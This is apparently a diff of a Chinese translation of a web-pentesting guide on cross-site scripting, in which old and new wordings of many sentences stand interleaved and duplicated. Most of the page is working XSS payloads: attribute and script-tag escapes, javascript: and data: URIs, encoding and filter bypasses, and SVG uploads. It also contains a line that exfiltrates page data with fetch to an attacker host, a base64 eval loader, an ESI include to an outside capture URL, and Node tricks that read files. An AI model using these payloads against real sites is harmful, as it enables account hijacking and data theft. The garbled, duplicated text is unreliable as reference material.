如果你的输入在 **原始 HTML** 页面中被 **反射**,你需要利用某些 **HTML 标签** 来执行 JS 代码:`<img , <iframe , <svg , <script` ... 这些只是你可以使用的许多可能的 HTML 标签中的一些。\
此外,请记住 [客户端模板注入](../client-side-template-injection-csti.md)。
### 在 HTML 标签属性内
如果你的输入在标签的属性值中被反射,你可以尝试:
1. **逃逸属性和标签**(然后你将处于原始 HTML 中)并创建新的 HTML 标签进行利用:`"><img [...]`
2. 如果你 **可以逃逸属性但不能逃逸标签**`>` 被编码或删除),根据标签的不同,你可以 **创建一个事件** 来执行 JS 代码:`" autofocus onfocus=alert(1) x="`
3. 如果你 **无法逃逸属性**`"` 被编码或删除),那么根据 **你的值被反射在哪个属性** 以及 **你是否控制整个值或仅部分值**,你将能够进行利用。例如,如果你控制一个事件如 `onclick=`,你将能够使其在点击时执行任意代码。另一个有趣的 **例子** 是属性 `href`,你可以使用 `javascript:` 协议来执行任意代码:**`href="javascript:alert(1)"`**
4. 如果你的输入在 "**不可利用的标签**" 被反射,你可以尝试 **`accesskey`** 技巧来利用这个漏洞(你将需要某种社交工程来利用这一点):**`" accesskey="x" onclick="alert(1)" x="**
1. **从属性和标签中逃逸**(然后你将处于原始 HTML 中)并创建新的 HTML 标签进行利用:`"><img [...]`
2. 如果你 **可以从属性中逃逸但不能从标签中逃逸**`>` 被编码或删除),根据标签你可以 **创建一个事件** 来执行 JS 代码:`" autofocus onfocus=alert(1) x="`
3. 如果你 **无法从属性中逃逸**`"` 被编码或删除),那么根据 **你的值被反射在哪个属性中**,如果你控制整个值或仅部分值,你将能够利用它。例如,如果你控制一个事件如 `onclick=`,你将能够使其在点击时执行任意代码。另一个有趣的 **例子** 是属性 `href`,你可以使用 `javascript:` 协议来执行任意代码:**`href="javascript:alert(1)"`**
4. 如果你的输入在 "**不可利用的标签**" 被反射,你可以尝试 **`accesskey`** 技巧来利用这个漏洞(你将需要某种社会工程来利用它):**`" accesskey="x" onclick="alert(1)" x="`**
如果你控制类名Angular 执行 XSS 的奇怪例子:
如果你控制一个类名Angular 执行 XSS 的奇怪例子:
```html
<div ng-app>
<strong class="ng-init:constructor.constructor('alert(1)')()">aaa</strong>
@ -67,10 +67,10 @@ debugging-client-side-js.md
```
### Inside JavaScript code
在这种情况下,您的输入反映在 HTML 页面中的 **`<script> [...] </script>`** 标签之间,或者在 `.js` 文件中,或在使用 **`javascript:`** 协议的属性中:
在这种情况下,您的输入反映在 HTML 页面中的 **`<script> [...] </script>`** 标签之间`.js` 文件中或使用 **`javascript:`** 协议的属性中:
- 如果反映在 **`<script> [...] </script>`** 标签之间,即使您的输入在任何类型的引号内,您可以尝试注入 `</script>` 并从此上下文中逃脱。这是因为 **浏览器会首先解析 HTML 标签** 然后解析内容,因此,它不会注意到您注入的 `</script>` 标签在 HTML 代码中。
- 如果反映 **在 JS 字符串内**,并且最后技巧不起作用,您需要 **退出** 字符串,**执行** 您的代码并 **重构** JS 代码(如果有任何错误,它将不会被执行):
- 如果反映在 **`<script> [...] </script>`** 标签之间,即使您的输入在任何类型的引号内,您可以尝试注入 `</script>` 并从此上下文中逃脱。这是有效的,因为 **浏览器会首先解析 HTML 标签** 然后解析内容,因此,它不会注意到您注入的 `</script>` 标签在 HTML 代码中。
- 如果反映 **在 JS 字符串内**,并且最后一个技巧不起作用,您需要 **退出** 字符串,**执行** 您的代码并 **重构** JS 代码(如果有任何错误,它将不会被执行):
- `'-alert(1)-'`
- `';-alert(1)//`
- `\';alert(1)//`
@ -94,7 +94,7 @@ js-hoisting.md
一些网页有端点**接受作为参数要执行的函数名称**。在实际中常见的例子是类似于:`?callback=callbackFunc`
找出用户直接提供的内容是否试被执行的一个好方法是**修改参数值**(例如改为 'Vulnerable'),并在控制台中查找错误,例如:
找出用户直接提供的内容是否试被执行的一个好方法是**修改参数值**(例如改为 'Vulnerable'),并在控制台中查找错误,例如:
![](<../../images/image (711).png>)
@ -114,9 +114,9 @@ parentElement
```
您还可以尝试直接**触发 Javascript 函数**`obj.sales.delOrders`
然而,通常执行所指示函数的端点是没有太多有趣 DOM 的端点,**同一源中的其他页面**将具有**更有趣的 DOM**以执行更多操作。
然而,通常执行指定函数的端点是没有太多有趣 DOM 的端点,**同一源中的其他页面**将具有**更有趣的 DOM**以执行更多操作。
因此,为了在不同的 DOM 中**利用此漏洞**,开发了**同源方法执行 (SOME)** 利用:
因此,为了**在不同 DOM 中滥用此漏洞**,开发了**同源方法执行 (SOME)** 利用:
{{#ref}}
some-same-origin-method-execution.md
@ -132,7 +132,7 @@ dom-xss.md
### **通用 XSS**
这种类型的 XSS 可以在**任何地方**找到。它们不仅依赖于对 Web 应用程序的客户端利用,而是依赖于**任何****上下文**。这种**任意 JavaScript 执行**甚至可以被滥用以获得**RCE**、**读取**客户端和服务器中的**任意****文件**等。\
这种类型的 XSS 可以在**任何地方**找到。它们不仅依赖于对 Web 应用程序的客户端利用,依赖于**任何****上下文**。这种**任意 JavaScript 执行**甚至可以被滥用以获得**RCE**、**读取****任意****文件**在客户端和服务器上,等等。\
一些**示例**
{{#ref}}
@ -149,11 +149,11 @@ server-side-xss-dynamic-pdf.md
## 在原始 HTML 中注入
当您的输入在**HTML 页面中反射**或您可以在此上下文中转义并注入 HTML 代码时,您需要做的**第一**件事是检查您是否可以`<` 来创建新标签:只需尝试**反射**该**字符**并检查它是否被**HTML 编码**或**删除**,或者是否**未更改地反射**。**只有在最后一种情况下,您才能利用此情况**。\
当您的输入在**HTML 页面中反射**或您可以在此上下文中转义并注入 HTML 代码时,您需要做的**第一**件事是检查您是否可以`<` 来创建新标签:只需尝试**反射**该**字符**并检查它是否被**HTML 编码**或**删除**,或者是否**未更改地反射**。**只有在最后一种情况下,您才能利用此情况**。\
对于这些情况,还**请记住** [**客户端模板注入**](../client-side-template-injection-csti.md)**。**\
_**注意HTML 注释可以使用\*\*\*\*\*\***\***\*`-->`\*\***\***\*或 \*\*\*\*\*\***`--!>`\*\*_
在这种情况下,如果没有使用黑名单/白名单,您可以使用以下有效负载
在这种情况下,如果没有使用黑名单/白名单,您可以使用如下有效载荷
```html
<script>
alert(1)
@ -162,11 +162,11 @@ alert(1)
<svg onload=alert('XSS')>
```
但是,如果使用了标签/属性的黑白名单,您需要**暴力破解可以创建的标签**。\
一旦您**找到了允许的标签**,您需要**暴力破解属性/事件**,以查看如何攻击该上下文。
一旦您**找到了允许的标签**,您需要**暴力破解**在找到的有效标签内的属性/事件,以查看如何攻击该上下文。
### 标签/事件暴力破解
访问 [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet),然后点击 _**复制标签到剪贴板**_然后,使用 Burp intruder 发送所有标签,并检查是否有任何标签未被 WAF 识别为恶意。一旦您发现可以使用的标签,您可以使用有效标签**暴力破解所有事件**(在同一网页上点击 _**复制事件到剪贴板**_,并按照之前的相同程序进行操作)。
访问 [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet),然后点击 _**复制标签到剪贴板**_接着,使用 Burp intruder 发送所有标签,并检查是否有任何标签未被 WAF 识别为恶意。一旦您发现可以使用的标签,您可以使用有效标签**暴力破解所有事件**(在同一网页上点击 _**复制事件到剪贴板**_,并按照之前的程序进行)。
### 自定义标签
@ -239,18 +239,18 @@ onerror=alert`1`
### Click XSS - Clickjacking
如果为了利用该漏洞,您需要 **用户点击一个链接或一个带有预填充数据的表单**,您可以尝试 [**滥用 Clickjacking**](../clickjacking.md#xss-clickjacking)(如果页面存在漏洞)。
如果为了利用该漏洞,你需要 **用户点击一个链接或一个带有预填充数据的表单**,你可以尝试 [**滥用 Clickjacking**](../clickjacking.md#xss-clickjacking)(如果页面存在漏洞)。
### 不可能 - 悬挂标记
如果您认为 **创建一个带有执行 JS 代码的属性的 HTML 标签是不可能的**,您应该查看 [**悬挂标记**](../dangling-markup-html-scriptless-injection/index.html),因为可以 **在不执行** **JS** 代码的情况下 **利用** 该漏洞。
如果你认为 **创建一个带有属性以执行 JS 代码的 HTML 标签是不可能的**,你应该检查 [**悬挂标记**](../dangling-markup-html-scriptless-injection/index.html),因为可以 **在不执行** **JS** 代码的情况下 **利用** 该漏洞。
## 在 HTML 标签内注入
### 在标签内/从属性值中转义
如果您在 **HTML 标签内**,您可以尝试的第一件事是 **从标签中转义**,并使用 [上一节](#injecting-inside-raw-html) 中提到的一些技术来执行 JS 代码。\
如果**无法从标签中转义**,您可以在标签内创建新的属性以尝试执行 JS 代码例如使用一些有效载荷_请注意在此示例中使用双引号从属性中转义如果您的输入直接反映在标签内不需要它们_
如果你在 **HTML 标签内**,你可以尝试的第一件事是 **从标签中转义**,并使用 [上一节](#injecting-inside-raw-html) 中提到的一些技术来执行 JS 代码。\
如果**无法从标签中转义**,你可以在标签内创建新的属性以尝试执行 JS 代码例如使用一些有效载荷_注意在这个例子中使用双引号来从属性中转义如果你的输入直接反映在标签内你将不需要它们_
```bash
" autofocus onfocus=alert(document.domain) x="
" onfocus=alert(1) id=x tabindex=0 style=display:block>#x #Access http://site.com/?#x t
@ -265,14 +265,14 @@ onerror=alert`1`
#moving your mouse anywhere over the page (0-click-ish):
<div style="position:fixed;top:0;right:0;bottom:0;left:0;background: rgba(0, 0, 0, 0.0);z-index: 5000;" onmouseover="alert(1)"></div>
```
### 在属性内
### Within the attribute
即使你**无法逃离属性**`"`被编码或删除),根据**你的值被反射在哪个属性**中**如果你控制所有值或只是部分值**,你仍然能够利用它。**例如**,如果你控制一个事件如`onclick=`,你将能够使其在点击时执行任意代码。\
即使你**无法从属性中逃脱**`"`被编码或删除),根据**你的值反射在哪个属性中****如果你控制所有值或只是部分值**,你将能够利用它。例如,如果你控制一个事件如`onclick=`,你将能够使其在点击时执行任意代码。\
另一个有趣的**例子**是属性`href`,你可以使用`javascript:`协议来执行任意代码:**`href="javascript:alert(1)"`**
**使用HTML编码/URL编码绕过事件**
**通过HTML编码/URL编码绕过事件**
HTML标签属性值内的**HTML编码字符**在运行时会被**解码**。因此,像以下内容将是有效的(有效负载用粗体表示):`<a id="author" href="http://none" onclick="var tracker='http://foo?`**`&apos;-alert(1)-&apos;`**`';">返回</a>`
HTML标签属性值中的**HTML编码字符**在运行时**被解码**。因此,像以下内容将是有效的(有效负载用粗体表示):`<a id="author" href="http://none" onclick="var tracker='http://foo?`**`&apos;-alert(1)-&apos;`**`';">Go Back </a>`
请注意**任何类型的HTML编码都是有效的**
```javascript
@ -303,7 +303,7 @@ HTML标签属性值内的**HTML编码字符**在运行时会被**解码**。因
```
### 特殊协议在属性中
在某些地方,您可以使用协议 **`javascript:`** 或 **`data:`** 来 **执行任意 JS 代码**。有些需要用户交互,有些则不需要。
在某些地方,您可以使用协议 **`javascript:`** 或 **`data:`** 来 **执行任意 JS 代码**。有些需要用户交互,有些则不需要。
```javascript
javascript:alert(1)
JavaSCript:alert(1)
@ -325,7 +325,7 @@ data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc
```
**可以注入这些协议的地方**
**一般来说** `javascript:` 协议可以 **用于任何接受 `href` 属性的标签**,以及 **大多数** 接受 **`src` 属性的标签**(但不包括 `<img>`
**一般来说** `javascript:` 协议可以 **在任何接受 `href` 属性的标签中使用**,并且在 **大多数** 接受 **`src` 属性的标签中使用**(但不包括 `<img>`
```html
<a href="javascript:alert(1)">
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
@ -347,17 +347,17 @@ data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc
```
**其他混淆技巧**
_**在这种情况下上一节中的HTML编码和Unicode编码技巧也是有效的,因为您在一个属性内。**_
_**在这种情况下上一节中的HTML编码和Unicode编码技巧在属性内也是有效的。**_
```javascript
<a href="javascript:var a='&apos;-alert(1)-&apos;'">
```
此外,还有另一个 **不错的技巧****即使你在 `javascript:...` 中的输入被 URL 编码,它在执行之前会被 URL 解码。** 所以,如果你需要使用 **单引号** **字符串** **逃逸**,并且你看到 **它被 URL 编码**,请记住 **这没关系,** **执行** 时会被 **解释** **单引号**
此外,对于这些情况还有另一个**不错的技巧****即使你在 `javascript:...` 中的输入被 URL 编码,它在执行之前会被 URL 解码。** 所以,如果你需要使用**单引号**从**字符串**中**逃逸**,并且你看到**它被 URL 编码**,请记住**这没关系,**在**执行**时会被**解释**为**单引号**。
```javascript
&apos;-alert(1)-&apos;
%27-alert(1)-%27
<iframe src=javascript:%61%6c%65%72%74%28%31%29></iframe>
```
注意,如果你尝试以任何顺序同时使用 `URLencode + HTMLencode` 来编码 **payload**,它 **将** **不起作用**,但你可以在 **payload****混合使用它们**
注意,如果你尝试以任何顺序同时使用 `URLencode + HTMLencode` 来编码 **payload**,它 **将不会** **工作**,但你可以在 **payload****混合使用它们**
**使用 Hex 和 Octal 编码与 `javascript:`**
@ -373,7 +373,7 @@ _**在这种情况下上一节中的HTML编码和Unicode编码技巧也是有
<svg onload=javascript:'\x61\x6c\x65\x72\x74\x28\x31\x29' />
<svg onload=javascript:'\141\154\145\162\164\50\61\51' />
```
### 反向标签劫持
### 反向标签窃取
```javascript
<a target="_blank" rel="opener"
```
@ -422,15 +422,15 @@ onbeforetoggle="alert(2)" />
<button popovertarget="newsletter">Subscribe to newsletter</button>
<div popover id="newsletter">Newsletter popup</div>
```
从[**这里**](https://portswigger.net/research/xss-in-hidden-input-fields):您可以在**隐藏属性**中执行**XSS有效负载**,前提是您能够**说服****受害者**按下**键组合**。在Firefox Windows/Linux上键组合是**ALT+SHIFT+X**在OS X上是**CTRL+ALT+X**。您可以使用访问键属性中的不同键指定不同的键组合。这里是向量:
从[**这里**](https://portswigger.net/research/xss-in-hidden-input-fields):您可以在隐藏属性中执行**XSS有效负载**,前提是您可以**说服****受害者**按下**键组合**。在Firefox Windows/Linux上键组合是**ALT+SHIFT+X**在OS X上是**CTRL+ALT+X**。您可以使用访问键属性中的不同键指定不同的键组合。这里是向量:
```html
<input type="hidden" accesskey="X" onclick="alert(1)">
```
**XSS有效载将类似于:`" accesskey="x" onclick="alert(1)" x="`**
**XSS有效载将类似于:`" accesskey="x" onclick="alert(1)" x="`**
### 黑名单绕过
本节中已经揭示了几种使用不同编码的技巧。请**返回学习您可以使用的地方**
本节中已经揭示了几种使用不同编码的技巧。请**返回学习可以使用的内容**
- **HTML编码HTML标签**
- **Unicode编码可以是有效的JS代码** `\u0061lert(1)`
@ -440,7 +440,7 @@ onbeforetoggle="alert(2)" />
**HTML标签和属性的绕过**
阅读[一节的黑名单绕过](#blacklist-bypasses)。
阅读[一节的黑名单绕过](#blacklist-bypasses)。
**JavaScript代码的绕过**
@ -448,11 +448,11 @@ onbeforetoggle="alert(2)" />
### CSS小工具
如果您在网络的**非常小的部分**发现了**XSS**需要某种交互也许是页脚中的一个小链接带有onmouseover元素可以尝试**修改该元素占据的空间**以最大化触发链接的概率。
如果你在网页的**非常小的部分**发现了**XSS**并且需要某种交互可能是页脚中的一个小链接带有onmouseover元素可以尝试**修改该元素占据的空间**以最大化触发链接的概率。
例如,可以在元素中添加一些样式,如:`position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-color: red; opacity: 0.5`
例如,可以在元素中添加一些样式,如:`position: fixed; top: 0; left: 0; width: 100%; height: 100%; background-color: red; opacity: 0.5`
但是如果WAF正在过滤样式属性您可以使用CSS样式小工具因此如果您发现,例如
但是如果WAF正在过滤样式属性你可以使用CSS样式小工具因此如果你发现,例如
> .test {display:block; color: blue; width: 100%\}
@ -460,7 +460,7 @@ onbeforetoggle="alert(2)" />
> \#someid {top: 0; font-family: Tahoma;}
现在可以修改我们的链接并将其变为
现在可以修改我们的链接并将其变为
> \<a href="" id=someid class=test onclick=alert() a="">
@ -468,11 +468,11 @@ onbeforetoggle="alert(2)" />
## 在JavaScript代码中注入
在这些情况下,的**输入**将**反映在.js文件的JS代码**中,或在`<script>...</script>`标签之间或在可以执行JS代码的HTML事件之间或在接受`javascript:`协议的属性之间。
在这些情况下,的**输入**将**反映在.js文件的JS代码**中,或在`<script>...</script>`标签之间或在可以执行JS代码的HTML事件之间或在接受`javascript:`协议的属性之间。
### 转义\<script>标签
如果的代码插入在`<script> [...] var input = 'reflected data' [...] </script>`中,可以轻松地**转义关闭`<script>`**标签:
如果的代码插入在`<script> [...] var input = 'reflected data' [...] </script>`中,可以轻松地**转义关闭`<script>`**标签:
```javascript
</script><img src=1 onerror=alert(document.domain)>
```
@ -739,7 +739,7 @@ top[8680439..toString(30)](1)
```
## **DOM 漏洞**
**JS 代码** 使用 **由攻击者控制的不安全数据**,如 `location.href`。攻击者可以利用这一点执行任意的 JS 代码。\
**JS 代码** 使用 **由攻击者控制的不安全数据**,如 `location.href`。攻击者可以利用这一点执行任意的 JS 代码。\
**由于对** [**DOM 漏洞的解释扩展,已移至此页面**](dom-xss.md)**:**
{{#ref}}
@ -749,11 +749,11 @@ dom-xss.md
在那里你会找到关于 **DOM 漏洞是什么、如何引发以及如何利用它们的详细解释**。\
此外,不要忘记在 **提到的帖子末尾** 你可以找到关于 [**DOM Clobbering 攻击**](dom-xss.md#dom-clobbering) 的解释。
### 升级 Self-XSS
### 升级自我 XSS
### Cookie XSS
如果你可以通过在 cookie 中发送有效负载来触发 XSS这通常是自我 XSS。然而如果你发现一个 **易受 XSS 攻击的子域名**,你可以利用这个 XSS 在整个域中注入一个 cookie从而在主域或其他子域易受 cookie XSS 攻击的那些)中触发 cookie XSS。为此你可以使用 cookie tossing 攻击:
如果你可以通过在 cookie 中发送有效负载来触发 XSS这通常是自我 XSS。然而如果你发现一个 **易受 XSS 攻击的子域名**,你可以利用这个 XSS 在整个域中注入一个 cookie从而在主域或其他子域易受 cookie XSS 攻击的那些)中触发 cookie XSS。为此你可以使用 cookie 投掷攻击:
{{#ref}}
../hacking-with-cookies/cookie-tossing.md
@ -783,12 +783,12 @@ dom-xss.md
```
### Ruby-On-Rails 绕过
由于 **RoR 大量赋值**,引号被插入到 HTML 中,然后绕过引号限制,并且可以在标签内添加额外字段onfocus。\
表单示例 ([from this report](https://hackerone.com/reports/709336)),如果发送有效负载:
由于 **RoR 大量赋值**,引号被插入到 HTML 中,然后引号限制被绕过额外字段onfocus可以被添加到标签内。\
表单示例 ([from this report](https://hackerone.com/reports/709336)),如果发送有效负载:
```
contact[email] onfocus=javascript:alert('xss') autofocus a=a&form_type[a]aaa
```
成对的 "Key","Value" 将被回显如下:
"键","值"将被回显如下:
```
{" onfocus=javascript:alert(&#39;xss&#39;) autofocus a"=>"a"}
```
@ -824,12 +824,12 @@ contact[email] onfocus=javascript:alert('xss') autofocus a=a&form_type[a]aaa
window[`al`+/e/[`ex`+`ec`]`e`+`rt`](2)
document['default'+'View'][`\u0061lert`](3)
```
### XSS与302响应中的头注入
### XSS与302响应中的头注入
如果你发现可以**在302重定向响应中注入头部**,你可以尝试**让浏览器执行任意JavaScript**。这**并不简单**因为现代浏览器在HTTP响应状态码为302时不会解释HTTP响应体因此仅仅一个跨站脚本有效载荷是无用的。
在[**这份报告**](https://www.gremwell.com/firefox-xss-302)和[**这份报告**](https://www.hahwul.com/2020/10/03/forcing-http-redirect-xss/)中,你可以阅读如何在Location头中测试几种协议并查看其中是否有任何协议允许浏览器检查并执行体内的XSS有效载荷。\
已知的过去协议:`mailto://``//x:1/``ws://``wss://`、_空Location头_、`resource://`
在[**这份报告**](https://www.gremwell.com/firefox-xss-302)和[**这份报告**](https://www.hahwul.com/2020/10/03/forcing-http-redirect-xss/)中,你可以阅读如何测试Location头部中的几种协议并查看其中是否有任何协议允许浏览器检查并执行体内的XSS有效载荷。\
已知的过去协议:`mailto://``//x:1/``ws://``wss://`_空Location头部_`resource://`
### 仅限字母、数字和点
@ -841,7 +841,7 @@ document['default'+'View'][`\u0061lert`](3)
> 拒绝从‘[https://uploader.c.hc.lc/uploads/xxx'](https://uploader.c.hc.lc/uploads/xxx')执行脚本因为其MIME类型application/octet-stream不可执行并且启用了严格的MIME类型检查。
唯一支持Chrome运行**加载脚本**的**Content-Type**是[https://chromium.googlesource.com/chromium/src.git/+/refs/tags/103.0.5012.1/third_party/blink/common/mime_util/mime_util.cc](https://chromium.googlesource.com/chromium/src.git/+/refs/tags/103.0.5012.1/third_party/blink/common/mime_util/mime_util.cc)中const **`kSupportedJavascriptTypes`**中的类型。
唯一支持Chrome运行**加载脚本**的**Content-Type**是来自[https://chromium.googlesource.com/chromium/src.git/+/refs/tags/103.0.5012.1/third_party/blink/common/mime_util/mime_util.cc](https://chromium.googlesource.com/chromium/src.git/+/refs/tags/103.0.5012.1/third_party/blink/common/mime_util/mime_util.cc)的常量**`kSupportedJavascriptTypes`**中的类型。
```c
const char* const kSupportedJavascriptTypes[] = {
"application/ecmascript",
@ -869,8 +869,10 @@ const char* const kSupportedJavascriptTypes[] = {
```html
<script type="???"></script>
```
- **module** (默认,无需解释)
- [**webbundle**](https://web.dev/web-bundles/): Web Bundles 是一个功能您可以将一堆数据HTML、CSS、JS…打包到一个 **`.wbn`** 文件中。
答案是:
- **module**(默认,无需解释)
- [**webbundle**](https://web.dev/web-bundles/)Web Bundles 是一个功能您可以将一堆数据HTML、CSS、JS…打包到一个 **`.wbn`** 文件中。
```html
<script type="webbundle">
{
@ -994,13 +996,13 @@ import("fs").then((m) => console.log(m.readFileSync("/flag.txt", "utf8")))
```
- 间接访问 `require`
[根据这个](https://stackoverflow.com/questions/28955047/why-does-a-module-level-return-statement-work-in-node-js/28955050#28955050)模块在 Node.js 中被包装在一个函数内,如下所示:
[根据这个](https://stackoverflow.com/questions/28955047/why-does-a-module-level-return-statement-work-in-node-js/28955050#28955050) 模块在 Node.js 中被包装在一个函数内,如下所示:
```javascript
;(function (exports, require, module, __filename, __dirname) {
// our actual module code
})
```
因此,如果我们可以从该模块**调用另一个函数**,则可以使用`arguments.callee.caller.arguments[1]`从该函数访问**`require`**
因此,如果我们可以从该模块**调用另一个函数**,则可以使用 `arguments.callee.caller.arguments[1]` 从该函数访问 **`require`**
```javascript
;(function () {
return arguments.callee.caller.arguments[1]("fs").readFileSync(
@ -1051,7 +1053,6 @@ trigger()
- **同一页面中的不同混淆:** [**https://aem1k.com/aurebesh.js/**](https://aem1k.com/aurebesh.js/)
- [https://github.com/aemkei/katakana.js](https://github.com/aemkei/katakana.js)
- [https://ooze.ninja/javascript/poisonjs](https://ooze.ninja/javascript/poisonjs)
- [https://javascriptobfuscator.herokuapp.com/](https://javascriptobfuscator.herokuapp.com)
- [https://skalman.github.io/UglifyJS-online/](https://skalman.github.io/UglifyJS-online/)
- [http://www.jsfuck.com/](http://www.jsfuck.com)
@ -1283,7 +1284,7 @@ fetch(attacker + "?" + encodeURI(btoa(xhr.responseText)))
xhr.open("GET", url, true)
xhr.send(null)
```
### 查找内部IP
### 查找内部IP地址
```html
<script>
var q = []
@ -1382,7 +1383,7 @@ body:username.value+':'+this.value
### Keylogger
仅在 GitHub 上搜索,我找到了几个不同的:
仅在 GitHub 上搜索,我发现了一些不同的:
- [https://github.com/JohnHoder/Javascript-Keylogger](https://github.com/JohnHoder/Javascript-Keylogger)
- [https://github.com/rajeshmajumdar/keylogger](https://github.com/rajeshmajumdar/keylogger)
@ -1499,7 +1500,7 @@ javascript:eval(atob("Y29uc3QgeD1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTt4Ln
```
### Regex - 访问隐藏内容
从 [**这篇文章**](https://blog.arkark.dev/2022/11/18/seccon-en/#web-piyosay) 可以了解到,即使某些值从 JS 中消失,仍然可以在不同对象的 JS 属性中找到它们。例如REGEX 的输入仍然可以在正则表达式的输入值被移除后找到:
从 [**这篇文章**](https://blog.arkark.dev/2022/11/18/seccon-en/#web-piyosay) 可以了解到,即使某些值从 JS 中消失,仍然可以在不同对象的 JS 属性中找到它们。例如REGEX 的输入在正则表达式的输入值被移除后仍然可以找到:
```javascript
// Do regex with flag
flag = "CTF{FLAG}"
@ -1534,16 +1535,16 @@ xss-in-markdown.md
### XSS 到 SSRF
在一个 **使用缓存** 的网站上获得了 XSS尝试通过边缘侧包含注入将其 **升级到 SSRF**,使用这个有效载荷:
在一个 **使用缓存的网站** 上获得了 XSS尝试通过边缘侧包含注入将其 **升级为 SSRF**,使用以下有效载荷:
```python
<esi:include src="http://yoursite.com/capture" />
```
用它来绕过 cookie 限制、XSS 过滤器等更多内容!\
有关此技术的更多信息,请查看[**XSLT**](../xslt-server-side-injection-extensible-stylesheet-language-transformations.md)。
使用它来绕过 cookie 限制、XSS 过滤器等更多内容!\
有关此技术的更多信息,请参见[**XSLT**](../xslt-server-side-injection-extensible-stylesheet-language-transformations.md)。
### 动态创建 PDF 中的 XSS
如果网页使用用户控制的输入创建 PDF您可以尝试 **欺骗创建 PDF 的机器人** 使其 **执行任意 JS 代码**。\
如果网页使用用户控制的输入创建 PDF您可以尝试 **欺骗创建 PDF 的机器人** **执行任意 JS 代码**。\
因此,如果 **PDF 创建机器人发现** 某种 **HTML** **标签**,它将会 **解释** 这些标签,您可以 **利用** 这种行为导致 **服务器 XSS**
{{#ref}}
@ -1562,7 +1563,7 @@ AMP 旨在加速移动设备上的网页性能,结合了 HTML 标签和 JavaSc
[**AMP for Email**](https://amp.dev/documentation/guides-and-tutorials/learn/email-spec/amp-email-format/) 格式将特定的 AMP 组件扩展到电子邮件中,使收件人能够直接在电子邮件中与内容互动。
示例 [**在 Gmail 中的 Amp4Email XSS 写作**](https://adico.me/post/xss-in-gmail-s-amp4email)。
示例 [**在 Gmail 中的 Amp4Email XSS 写作**](https://adico.me/post/xss-in-gmail-s-amp4email)。
### XSS 上传文件 (svg)
@ -1624,7 +1625,7 @@ id="foo"/>
```
找到 **更多 SVG 载荷在** [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)
## 其他 JS 技巧与相关信息
## 杂项 JS 技巧与相关信息
{{#ref}}
other-js-tricks.md